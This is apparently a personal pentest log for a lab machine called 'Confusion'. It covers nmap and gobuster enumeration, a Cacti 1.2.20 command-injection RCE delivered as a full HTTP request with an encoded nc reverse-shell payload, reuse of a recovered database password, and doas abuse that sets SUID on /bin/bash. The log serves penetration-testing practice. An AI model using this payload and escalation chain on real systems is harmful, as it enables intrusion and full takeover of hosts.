Confusion
๐งช Pentest Log: {{date:2025-09-07}}
๐ Target Information
- Machine Name: Confusion
- IP Address: 192.168.219.99
- Operating System: Linux
ip=192.168.219.99
๐ก Enumeration
๐ Port Scanning
Command Used
ports=$(nmap -p- --min-rate=1000 -T4 $ip | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -p$ports -sC -sV $ip -oN tcp_scan_result.txt
nmap -sU --top-ports 100 $ip -oN udp_scan_result.txt
Port 22
Port 80, 443
Web Content Enumeration
gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/common.txt
found DNS address:
cacti-monitoring.confusion.pg
Visit https://cacti-monitoring.confusion.pg, found
Cacti Version 1.2.20
๐ฃ Exploitation
๐ Vulnerability Summary
- Service / Port: 443
- Vulnerability Type: RCE
๐ Exploit Execution
๐ง Exploit Method
Tool / Script Used:
https://www.exploit-db.com/exploits/51166
Examine the exploit, use burpsuite intruder to perform the attack
GET /remote_agent.php?action=polldata&local_data_ids[]=1&host_id=1&poller_id=;rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fbash%20-i%202%3E%261%7Cnc%20192.168.45.246%2080%20%3E%2Ftmp%2Ff HTTP/1.1
Host: cacti-monitoring.confusion.pg
Cookie: Cacti=fqb0e6fj54gek5tp2kq5003vp4; CactiDateTime=Mon%20Sep%2008%202025%2002%3A26%3A56%20GMT-0400%20(Eastern%20Daylight%20Time); CactiTimeZone=-240
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
Connection: keep-alive
X-Forwarded-For: 127.0.0.1
For the both position payload, given a integer list from 1-10
python3 /home/kali/Documents/Shell\ Handler/penelope/penelope.py -p 80
๐งฌ Privilege Escalation
๐ค Current Access
- User: www-data
- Groups: 33(www-data)
- Shell Type: reverse shell
๐ Enumeration
Linpeas:
chmod +x linpeas.sh
./linpeas.sh
Found database credential
cactiuser:uTyWUHAdetb3O23aUEOo1KRg
Reuse the password to login as james
su james
Rerun linpeas, found writeable path
/usr/local/sbin
and doas binary
/usr/local/sbin/systeminfo
๐ Privilege Escalation Exploit
๐ Exploit Summary
- Technique Used: Doas Abuse
- Target Binary/Service: systeminfo
- Reference / Source: N/A
๐ง Exploit Steps
- Setup
mv /usr/local/sbin/systeminfo /usr/local/sbin/systeminfo.bak
vi /usr/local/sbin/systeminfo
#! /bin/bash
chmod +s /bin/bash
chmod +x /usr/local/sbin/systeminfo
- Smash to root
doas /usr/local/sbin/systeminfo
./bash -p